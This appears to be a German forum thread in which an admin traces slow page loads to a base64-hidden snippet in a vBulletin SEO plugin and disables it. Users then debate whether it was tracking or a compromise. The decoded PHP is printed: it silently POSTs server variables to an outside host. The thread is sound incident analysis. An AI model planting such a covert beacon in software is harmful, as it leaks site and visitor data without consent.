Also mir hast nie geantwortet ^^ Bei MySQL halt auch noch die Frage ab wann Slow-Queries geloggt werden.
Also wenn du siehst, das bei jeden Request eine Netzwerkverbindung aufgebaut wird, dann ist es möglich mit blackfire.io zu profilen, welcher Code das macht. Ich helf gerne bei der Auswertung des Profils.
Schon einmal den DNS-Request mitgelesen? Das sollte die Suche nach dem Verursacher vereinfachen.
*** Edit ***
Alternativ könntest du versuchen mit dig -x <IP> oder auf dieser Seite die Domains von der IP-Adresse herauszufinden.
ja die Domain kenn ich www.vbulletin-scriptz.com nur ich kann das im Code und in der Datenbank nicht finden
*** Edit ***
@cmrudolph ne ich sehs bei tcdump
das ist bei meiner Config ganz einfach, der vom Server dürfen keine Verbindungen nach Außen aufgebaut werden 
Per DROP oder REJECT?
ne alle kommen nur über nen Proxy zum Server, daher fällt ein fremdes System auf (nein der Proxy ist nicht das Problem, ich habs getestet indem ich direkt auf den Server gegangen bin)
*** Edit ***
@SlaterB so jetzt dir mal antworten wird leider etwas chaotischer als ich dacht
nee das ist keiner hier zu Hause, das kann man nicht machen. Meine Leitung ist zwar recht dick aber das würdet ihr sehr stark merken
Du kannst dir keinen einfachen PC hinstellen, sobald du im Internet erreichbar bist bist du Angriffen ausgeliefert und da hab ich in den letzten Jahren auch schon gut lernen müssen.
Das ist ein Root Server bei Hetzner, daher kostet mich der Festplattenaustausch auch nix, außer viele Nerven 
Leider hatte ich den gleichen Spaß schon bei meinem letzten Root Server, kaum hatte ich ihn neu war ne Platte kaputt. Aber die eine neue läuft jetzt super die Leistung ist um ein vielfaches besser (was ich aufm Server sehe) leider zickt hier im Forum noch was anderes rum. Aber wie irgendwer nach dir geschrieben hatte, Festplatten sterben einfach irgendwann. Gerade wenn sie wie hier auf den Servern laufend lesen und schreiben müssen
Aktuell schwankt unser Traffik zwischen 2-3 Gig am Tag
Ich muss dir glaube mal die Illusionen zerstören „Mal schnell ein Forum bauen“ es ist relativ egal ob du 50 oder 5000 Posts am Tag hast, auch egal womit das Forum geschrieben ist. Die Basiscs sind die riesen Arbeit, alleine das die Software frei von möglichen Angrifspunkten ist, ist eine riesen Arbeit. Last ist selten ein Problem, weil das kannst du häufig mit mehr Power im Server erschlagen.
Und wie Lex auch schon geschrieben hatte, auf dem Server läuft ja nicht nur das Forum, auch unser Wiki und einige Dinge die ich noch betreibe.
@TheDarkRose danke für den Tipp mit dem Profiler, dank ihm hab ich die URL gefunden, sie (inkl den Befehlen) war base64 encoded im Code
Blöderweise geht mein Login gerade nicht für das vb forum nicht ob da ein Update für das Plugin ist
ich habs noch nicht genau angesehen, aber vielleicht habt ihr ja schon eine Idee wie man bisschen faken kann
$query = http_build_query(array("do" => "log", "data" => $_SERVER, "source_type" => "banuser", "source" => "0")); $fp = @fsockopen("www.vbulletin-scriptz.com", 80, $errno, $errstr, 10); if ($fp) { fwrite($fp, "POST /tracker.php HTTP/1.0
Host: www.vbulletin-scriptz.com
User-Agent: LuLzTr4ck3rZ
Content-Type: application/x-www-form-urlencoded
Content-Length: " . strlen($query) . "
" . $query); fclose($fp); }
*** Edit ***
ok auskommentieren reicht aus
ES LÄUFT
Uff, der Fakt das es base64 decoded ist und die Art des Codes deutet darauf, das bei dir eingebrochen worden ist… Wo war der Code? Den wirst schlecht du eingebaut haben… Witziger ist aber, dass nur $_SERVER geloggt wurde, welche vielleicht unsere IP-Addressen enthält, aber sonst nur immer die selben Server-Daten. Bei $_REQUEST oder $_POST wären unsere Passwörter futsch
ja ich finds auch extrem schräg, was gegen Einbruch spricht ist dass es in einem Plugin und nicht im Hauptteil des Forums ist
Ich hab gerade wieder paar Sicherheitssachen hoch geschraubt die ich beim Umzug weggelassen hab
Edit während des Schreibens
Nix häck, das ist im Plugin schon enthalten gewesen als ich es runtergeladen hab, scheint ne reine Tracking Maßnahme der Pluginleute zu sein
Juhuuu, es rennt wieder.
Bitte nicht mich mit @ nennen.
Dann lag ich ja gar nicht so falsch, Spam mechanismus / Update / Plugin.
Btw.: Traue niemals den Entwicklern des Forums daten an. …
Wieso nicht? Unsere IPs brauchen sie nun wirklich nicht, überdies lockt das Spammer an.
Im Worst case ist direkt die „Prozedur“ der Anmeldung betroffen, dann sollten alle ihre Passwörter ändern.
Aber nur im Worst case.
Meine IP futsch nicht so schlimm denn:
gibbets halt ne neue.
Jetzt hat TDR noch nach reject oder drop gefragt, Unterschiede gehen da schon sehr ins Eingemachte.
Wie es auch sei: Ich/wir bedanken uns, das alles wieder rennt. 
Edit: Es war aber schon nach 01:34 Uhr, als ich abgeschickt hatte.
Jetzt muss ich schlafen, wer am WoEn nach 2 Uhr und in der Woche nach 12 Uhr schläft, der ist dumm, hab ich gelesen . (ist natürlich Quatsch, aber wurscht)
Editierungskennzeichnung 2: Mehrdeutig, nach 2 Uhr nicht schläft meinte ich.
verwirrt Und in WELCHEM Plugin war dieser ominöse (und den Beschreibungen nach ja SEHR suspekte) Code? Irgendeins von www. check-if-your-credit-card-was-stolen-by-entering-your-password-here.ru?
Ne Marco unser SEO Plugin, für sieht es rein nach einem Tracking Code aus
Ich würde mal sagen, da hat auf der Seite der Forensoftware jemand Mist gebaut, oder sie sind gehackt worden
Google Übersetzer (Habe mal die übersetzte Seite geladen, kann kein französisch)
Der whois vbulletin-scriptz.com: vBulletin-Scriptz.com WHOIS, DNS, & Domain Info - DomainTools Die Domain existiert schon länger, wurde aber erst Ende März aktualisiert. Ich hätte da ein ungutes Gefühl dabei, entweder jemand hat mit der Base64 versucht seine Tracking Logik vor Manipulation zu schützen, oder versucht etwas was nicht astrein ist. Zusammen mit der Tatsache, dass du dich gerade nicht bei vBulletin anmelden kannst, würde meine Admin-Paranioa glaube ich noch mehr befeuern. Gibt es da einen Support den man anfragen kann oder kostet der extra?
Edit: Ich will ja auch keine Panik machen Da unter der URL die Datei tracking.php nicht existiert, könnte es auch sein dass der Plugin Ersteller a) Auf seinem Server Mist gebaut hat, b) die Domain verloren/verkauft hat.
Wenn das s durch ein “z” ersetzt ist, ist das nicht immer sowas wie ein Codewort für “illegal”?
Erklärt aber auch einiges, der Server hat nicht auf die Anfrage nicht geantwortet. Erklärt auch warum solange “gewartet” wurde beim Seitenaufbau.
Das passt auch hiermit nicht ganz zusammen:
Egal ob die tracker.php existiert oder nicht, das Verhalten hätte sich dann nicht ändern dürfen.
Gruß
Fancy
Unseriös ist auch, dass die Domain mit einem Whois-Guard geschützt ist…
ja das ist recht komisch, ich habe gerade mal die Changelogs durch gesehen und kein Wort dazu gefunden, in der Version die ich davor hatte ist die Zeile nicht enthalten und in der aktuellsten Version auch nicht mehr (die installiere ich nachher noch)
Wer weiß was es damit auf sich hatte.
Hab aber auch schon geguckt, es gibt keine weiteren base64 codierten Sachen, zumindest nicht in dieser Art und Weise
Nochmal für dummies: Wo kommt dieser Code her?
Korrigiert mich:
Irgendwo läuft dieser Server, der das ganze hier liefert. Da werden Plugins installiert. So ein Plugin ist ein Paket aus irgendwelchen PHP-Dateien (die ggf. obfuskiert d.h. unlesbar sind). Jeder kann so ein Plugin anbieten, und es gibt keine Möglichkeit rauszufinden, ob das was “böses” macht (außer “reputaion”, in dem Sinne dass viele andere das auch verwenden und sich nicht beschweren). Oder: Wo kommen die kleinen Plugins her? Woher weiß man, dass keins davon Sche!ße baut?
Und: So ein Plugin könnte Code wie den gegebenen zu legitimen (aber doch fragwürdigen) tracking-Zwecken verwenden (d.h. für eine Statistik “Wie oft wurde eine Seite aufgerufen, die auf einem Server liegt, der unser Plugin installiert hat?”). Sehe ich es richtig, dass das Plugin EINMAL installiert wird? (D.h. wenn es nachträglich “böse” gemacht wird, lädt der Server NICHT automatisch das böse nach?).
Klar du kannst dich hinsetzen und dir jedes Plugin was du einbindest, aber natürlich auch bei jedem Update komplett den Code durch gucken
als kleine Hausnummer, das SEO Plugin um das es hier geht hat fast 450 Dateien
Das SEO Plugin stammt von DragonByte® Technologies | Premium Mods & Addons welche das auch kommerziell vertreiben daher überrascht mich das
Kann auch sein, dass der Account des Pluginanbieters auf der Plattform gehackt wurde, das erklärt zumindest warum es in der vorherigen und in der aktuellen Version nicht mehr vorhanden ist.
ja und vor allem warum es so still schweigend gemacht wurde, weil sonst schreiben sie halbwegs was los ist und was geändert wurde
*** Edit ***
ach das hab ich vorhin übersehen @Marco13 ja da alles php ist kann ein Plugin problemlos Code nachladen, hier ists etwas schwerer, weil der Apache und damit das Forum/Plugin nicht in jedem Ordner schreiben darf. Aber theoretisch könnte das Plugin den Code auch temporär nachladen.